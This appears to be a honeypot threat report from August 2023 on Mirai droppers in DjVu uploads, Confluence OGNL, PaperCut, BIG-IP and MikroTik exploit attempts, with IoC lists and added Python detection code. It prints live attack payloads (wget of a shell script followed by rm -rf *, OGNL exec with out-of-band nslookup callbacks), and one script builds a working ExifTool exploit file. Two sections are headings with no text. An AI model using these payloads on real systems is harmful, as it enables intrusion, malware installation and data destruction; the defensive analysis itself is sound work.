
Our selection of alerts on honeypots: report 16 – August 2023

After a summer break, we are back with observations from our honeypots to give you a picture of what is going on on the Internet. Keeping track of trends, and of what threat actors actively scan for during their reconnaissance phase, allows defenders to adjust their cybersecurity posture.

The following report focuses on logs from the past month.

Check out our previous report here.

Mirai-based variants downloaded in JPG files

In August 2023, TEHTRIS monitored 11 IP addresses sending POST requests that upload a file named lol.jpg which, despite its extension, is a DjVu document carrying shell commands to download the Mirai botnet. All the requests were aimed at a Singaporean honeypot.

  • Timeline

We observed a constant flow of incoming requests from July 31st until August 11th, then a decrease followed by a surge on August 15th.

Timeline of POST requests containing a jpeg file

The command lines are not in JPEG metadata at all: they sit in the DjVu annotation chunk (ANTa) of the file, inside a Copyright string crafted so that a vulnerable ExifTool evaluates it as Perl and runs the embedded qx{} call. Simply opening the image in a viewer would not trigger them; they execute when a server-side tool such as ExifTool parses the file's metadata, for instance during upload processing.

  • Characteristics of the requests

The URL is “/$” followed by 4 digits.

URL       Share of requests
/$3261    97.15%
/$6684    2.478%
/$6341    0.248%
/$5341    0.124%

The RawData section contains the interesting part:

'--0002cdabf64440e48c7a0192d8bef98e\r\nContent-Type: image/jpeg\r\nContent-Disposition: form-data; name="file"; filename="lol.jpg"\r\nContent-Length: 1251\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright "\\\n" . qx{cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://195.58.39.193/trc.sh; curl -O <URL>; chmod 777 <filename>; sh <filename>;; rm -rf *;}. \\\n" b ") ) \n} . \\\n" b ") ) \n\r\n--0002cdabf64440e48c7a0192d8bef98e--\r\n'

This is very likely an attempt to exploit CVE-2021-22204 (CVSS3 7.8) and / or CVE-2021-22205 (CVSS3 10). CVE-2021-22204 is a vulnerability in ExifTool (versions 7.44 through 12.23) which can lead to arbitrary code execution due to improper neutralization of user data in the DjVu file format: the annotation string is passed to a Perl eval, so the qx{} call in the Copyright field runs as a shell command. ExifTool is an open-source program for reading, writing and manipulating image metadata; GitLab used it to strip metadata from uploaded images, which is why the same bug is exploitable unauthenticated against GitLab as CVE-2021-22205. Note that the part is declared as image/jpeg and named lol.jpg, but the body starts with the DjVu magic AT&TFORM; ExifTool identifies the format from the magic bytes, so the extension is irrelevant and an allow-list on file extension or declared Content-Type offers no protection.
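To show how such an upload can be spotted before any metadata tool parses it, here is an added example (our code, not TEHTRIS's and not ExifTool's) that parses the multipart body, compares the file's real magic bytes with the declared Content-Type, walks the DjVu chunk structure and pulls the qx{} commands and download URLs out of the ANTa annotation. The sample body is constructed to mirror the capture above; the command string, the dummy DIRM chunk and the multipart headers are assumptions, not the original bytes.

```python
import re
import struct
from typing import Dict, Iterator, List, Optional, Tuple

SAMPLE_BOUNDARY = b"0002cdabf64440e48c7a0192d8bef98e"
# Constructed command in the shape of the capture (the live one also fetched a second
# stager whose URL and filename are redacted in the report); not the original bytes.
SAMPLE_COMMAND = b"cd /tmp; wget http://195.58.39.193/trc.sh; chmod 777 trc.sh; sh trc.sh; rm -rf *"


def _chunk(cid: bytes, payload: bytes) -> bytes:
    """Encode one IFF85 chunk: 4-byte id, big-endian length, payload padded to even length."""
    return cid + struct.pack(">I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")


def build_sample_body() -> bytes:
    """Constructed multipart body modeled on the capture: the part is declared image/jpeg
    and named lol.jpg, but the data is a DjVu container whose ANTa annotation closes the
    Copyright string literal and splices in a Perl qx{} call."""
    ant = b'(metadata\n\t(Copyright "\\\n" . qx{' + SAMPLE_COMMAND + b'} . \\\n" b ") )\n'
    djvu = b"AT&T" + _chunk(
        b"FORM",
        b"DJVM"
        + _chunk(b"DIRM", b"\x81\x00\x01" + b"\x00" * 7)       # dummy directory chunk
        + _chunk(b"FORM", b"DJVI" + _chunk(b"ANTa", ant)),     # shared annotations
    )
    part = (b"Content-Type: image/jpeg\r\n"
            b'Content-Disposition: form-data; name="file"; filename="lol.jpg"\r\n'
            b"Content-Length: " + str(len(djvu)).encode() + b"\r\n\r\n" + djvu)
    return b"--" + SAMPLE_BOUNDARY + b"\r\n" + part + b"\r\n--" + SAMPLE_BOUNDARY + b"--\r\n"


def parse_multipart(body: bytes, boundary: bytes) -> List[Tuple[Dict[str, str], bytes]]:
    """Minimal multipart/form-data parser returning (headers, data) per part."""
    parts = []
    for raw in body.split(b"--" + boundary)[1:]:       # element 0 is the preamble
        if raw.startswith(b"--"):                       # closing delimiter "--boundary--"
            break
        if raw.startswith(b"\r\n"):
            raw = raw[2:]
        if raw.endswith(b"\r\n"):                       # CRLF before the next delimiter is not part data
            raw = raw[:-2]
        head, _, data = raw.partition(b"\r\n\r\n")
        headers: Dict[str, str] = {}
        for line in head.split(b"\r\n"):
            if not line:
                continue
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        parts.append((headers, data))
    return parts


def iter_djvu_chunks(data: bytes, start: int = 0, end: Optional[int] = None) -> Iterator[Tuple[bytes, bytes]]:
    """Walk an IFF85/DjVu container, descending into FORM containers, and yield
    (chunk_id, payload) for every leaf chunk."""
    end = len(data) if end is None else end
    pos = start + 4 if data.startswith(b"AT&T", start) else start
    while pos + 8 <= end:
        cid = data[pos:pos + 4]
        (length,) = struct.unpack(">I", data[pos + 4:pos + 8])
        body_start, body_end = pos + 8, pos + 8 + length
        if body_end > end:             # truncated or malformed chunk: stop, never read past the container
            break
        if cid == b"FORM":             # first 4 payload bytes are the form type (DJVM, DJVU, DJVI ...)
            yield from iter_djvu_chunks(data, body_start + 4, body_end)
        else:
            yield cid, data[body_start:body_end]
        pos = body_end + (length & 1)  # chunks are padded to an even length


QX_CALL = re.compile(rb"qx\{(.*?)\}", re.S)
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def analyse_upload(body: bytes, boundary: bytes) -> List[Dict]:
    """Flag uploaded parts that are really DjVu (whatever the declared type) and whose
    plain-text annotation chunk (ANTa) smuggles Perl qx{} command execution.
    Compressed annotations (ANTz) would need BZZ decompression first; not handled here."""
    findings = []
    for headers, data in parse_multipart(body, boundary):
        m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        finding: Dict = {
            "filename": m.group(1) if m else None,
            "declared_type": headers.get("content-type"),
            "actual_type": "djvu" if data.startswith(b"AT&TFORM") else "other",
            "commands": [],
        }
        if finding["actual_type"] == "djvu":
            for cid, payload in iter_djvu_chunks(data):
                if cid == b"ANTa":
                    finding["commands"] += [c.decode("latin-1") for c in QX_CALL.findall(payload)]
        finding["urls"] = URL_RE.findall(" ".join(finding["commands"]))
        finding["suspicious"] = bool(finding["commands"])
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyse_upload(build_sample_body(), SAMPLE_BOUNDARY):
        print(f)
```

The magic-versus-Content-Type mismatch alone is worth an alert on an upload endpoint; the qx{} extraction then gives the download URLs to block and to hunt for in proxy logs.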

  • Downloaded files

Among the hundreds of requests, six unique URLs appear in the RawData; four of them serve Mirai-based variants (the full list is in the IoCs below). The other two URLs had never been submitted to VirusTotal prior to our investigation.

  • IoCs

IP addresses:

204.10.194[.]68
84.54.51[.]204
193.34.212[.]110
190.211.252[.]50
45.128.232[.]83
66.118.232[.]225
193.177.182[.]23
45.95.146[.]79
64.112.72[.]102
74.50.95[.]126
94.156.102[.]66

URLs:

http[:]//195.58.39[.]193/trc.sh
http[:]//45.41.241[.]48/x86_64
http[:]//87.121.113[.]147/bins/sshdx86
http[:]//94.156.102[.]166/x-8.6.blaze
http[:]//45.41.241[.]48/x86_64
http[:]//104.234.220[.]161/sora.x86

Swedish IP address targeting Lithuanian honeypots

The same Swedish IP address, 77.91.87[.]196 (AS 210644, AEZA GROUP Ltd), attempted to find vulnerabilities on our Lithuanian honeypots on August 6th and 9th. The address is flagged as malicious by only 3 vendors on VirusTotal and by none of the other databases, and over the past week a dozen sources have started reporting it to AbuseIPDB. Here is a recap of the exploit attempts:

  • Confluence OGNL injection vulnerability (CVE-2022-26134)

Incoming GET requests from Swedish IP address 77.91.87[.]196 probed our Lithuanian honeypots for Confluence servers vulnerable to the OGNL injection tracked as CVE-2022-26134 (CVSS3 9.8). OGNL (Object-Graph Navigation Language) is a popular expression language for Java. Because vulnerable Confluence versions evaluated OGNL expressions placed in the URI path, an attacker can call arbitrary Java methods such as Runtime.exec, which yields remote code execution.

URLs:

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun")}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site")}/

The first payload runs whoami and copies its output into an X-Cmd-Response response header, so the result comes back in-band. The other two make the target run nslookup against a unique subdomain of oast.fun or oast.site, the callback domains of the Interactsh out-of-band testing tool: if the command executes, the DNS lookup reaches the attacker's Interactsh server and confirms blind code execution even when nothing is returned in the HTTP response. A confirmed target would then presumably receive a second command to download a malicious payload. At the time of writing, cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun resolves to Singaporean IP address 206.189.156[.]69, which is known for communicating with malicious files such as trojans.

Atlassian patched the vulnerability in June 2022; later Confluence versions are not affected.

  • PaperCut Authentication Bypass  (CVE-2023-27350)

CVE-2023-27350 (CVSS3 9.8) is a vulnerability disclosed by PaperCut in March 2023 that lets an unauthenticated attacker bypass authentication on the PaperCut MF/NG application server and execute arbitrary code remotely. According to an advisory by CISA, the vulnerability was exploited in the wild, including by the Bl00dy ransomware gang in a campaign against the education sector.

GET request: /app?service=page/SetupCompleted, the post-installation setup page that the bypass reaches without a valid session.

A patch has since been released.

  • BIG-IP iControl REST Authentication Bypass (CVE-2022-1388)

CVE-2022-1388 (CVSS3 9.8) is an authentication bypass in the iControl REST interface of BIG-IP systems which allows an unauthenticated attacker to execute arbitrary system commands, create or delete files, or disable services. Public exploits reach the bash utility endpoint with a Connection header that lists X-F5-Auth-Token, which makes the front end drop that header and the back end treat the request as already authenticated.

POST request: /mgmt/tm/util/bash

  • BIG-IP/BIG-IQ iControl REST RCE Attempt (CVE-2021-22986)

Packets similar to those detailed in our Report 15 were detected.
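The four probes above are easy to pick out of honeypot traffic by path and headers alone. The following added example (our code, not TEHTRIS's) classifies a set of constructed request records modeled on those requests: it percent-decodes the path so encoded OGNL payloads are caught, extracts the injected command and any Interactsh callback hostnames, recognises the PaperCut and BIG-IP paths, and flags the Connection: X-F5-Auth-Token header that public CVE-2022-1388 exploits carry. The record format, the header values and the benign control request are assumptions.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed honeypot records modeled on the requests described above; illustrative,
# not TEHTRIS log data. Headers and the benign request are assumptions.
SAMPLE_REQUESTS: List[Dict] = [
    {"src": "77.91.87.196", "method": "GET",
     "path": '/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime()'
             '.exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.'
             'ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/'},
    {"src": "77.91.87.196", "method": "GET",   # nslookup probe, percent-encoded as it often arrives
     "path": "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20"
             "cj7kh47mlg33m43j1d4g5o78ku3eei6ow.oast.fun%22%29%7D/"},
    {"src": "77.91.87.196", "method": "GET", "path": "/app?service=page/SetupCompleted"},
    {"src": "77.91.87.196", "method": "POST", "path": "/mgmt/tm/util/bash",
     "headers": {"Connection": "keep-alive, X-F5-Auth-Token", "X-F5-Auth-Token": "x",
                 "Authorization": "Basic YWRtaW46"}},   # "admin:" with an empty password
    {"src": "203.0.113.5", "method": "GET", "path": "/index.html"},   # benign control
]

OGNL_EXEC = re.compile(r'@java\.lang\.Runtime@getRuntime\(\)\.exec\("([^"]*)"\)')
# Default Interactsh (OAST) callback domains used by the nslookup probes
OAST_HOST = re.compile(r'\b[a-z0-9]+\.oast\.(?:fun|site|pro|live|me|online)\b')


def classify(req: Dict) -> Optional[Dict]:
    """Return a finding for one request, or None when no rule matches."""
    path = unquote(req["path"])     # decode first: OGNL payloads are usually percent-encoded
    method = req["method"].upper()
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    finding: Dict = {"src": req["src"], "path": path}

    # CVE-2022-26134: an OGNL expression injected directly into the request path
    if path.startswith("/${"):
        m = OGNL_EXEC.search(path)
        finding.update(cve="CVE-2022-26134",
                       command=m.group(1) if m else None,
                       callbacks=OAST_HOST.findall(path))
        return finding

    # CVE-2023-27350: PaperCut's SetupCompleted page reached without a session
    if method == "GET" and path.startswith("/app?service=page/SetupCompleted"):
        finding.update(cve="CVE-2023-27350")
        return finding

    # CVE-2022-1388: iControl REST bash endpoint; exploits list X-F5-Auth-Token in the
    # Connection header so the front end drops it and the back end trusts the request
    if method == "POST" and path.startswith("/mgmt/tm/util/bash"):
        finding.update(cve="CVE-2022-1388",
                       auth_bypass_header="x-f5-auth-token" in headers.get("connection", "").lower())
        return finding
    return None


def scan(requests: List[Dict]) -> List[Dict]:
    """Run every record through classify() and keep the hits."""
    return [f for f in (classify(r) for r in requests) if f]


def summarize(findings: List[Dict]) -> Dict[str, List[str]]:
    """Map each source IP to the sorted list of distinct CVEs it probed for."""
    by_src: Dict[str, set] = {}
    for f in findings:
        by_src.setdefault(f["src"], set()).add(f["cve"])
    return {src: sorted(cves) for src, cves in by_src.items()}


if __name__ == "__main__":
    hits = scan(SAMPLE_REQUESTS)
    for f in hits:
        print(f["src"], f["cve"], f.get("command") or f.get("callbacks") or f.get("auth_bypass_header", ""))
    print(summarize(hits))
```

Extracting the Interactsh hostnames is what turns a generic OGNL alert into something actionable: the unique subdomain ties the probe to one attacker session, and the resolved IP can be pivoted on as in the IoCs below.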

  • IoCs

77.91.87[.]196

206.189.156[.]69

cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun

cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site

Mikrotik Winbox RCE Attempt (CVE-2018-14847)

Between August 8th and 14th, we monitored attempts to exploit CVE-2018-14847 (CVSS3 9.1) coming from 3 IP addresses:

IP source          Country   AS
5.104.80[.]129     DK        AS 14199 (Contabo Asia Private Limited)
51.158.24[.]19     FR        AS 12876 (Scaleway S.a.s.)
185.38.148[.]134   GB        AS 25369 (Hydra Communications Ltd)

CVE-2018-14847 (CVSS3 9.1) is a directory traversal vulnerability in the WinBox interface of MikroTik RouterOS that allows an unauthenticated remote attacker to read arbitrary files (and an authenticated one to write them). The file read is typically used to retrieve the router's user database and thus its credentials. It was fixed in 2018 and added to CISA's Known Exploited Vulnerabilities catalog in December 2021. It is evidently still exploited in the wild, although this is the first time we have detected this exploit attempt in 2023.

Packets were sent over TCP/80, TCP/445, TCP/51801 and TCP/52802, none of which is the default WinBox port (TCP/8291).

The targets were exclusively European honeypots, with Lithuania, the Czech Republic and the United Kingdom ahead:

Country repartition of targeted honeypots

  • IoCs

5.104.80[.]129

51.158.24[.]19

185.38.148[.]134

Russian IP addresses probing for vulnerable Asus routers


WordPress vulnerability



      Information remain TEHTRIS sole property and reproduction is forbidden

      TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

      No warranty and liability

      TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.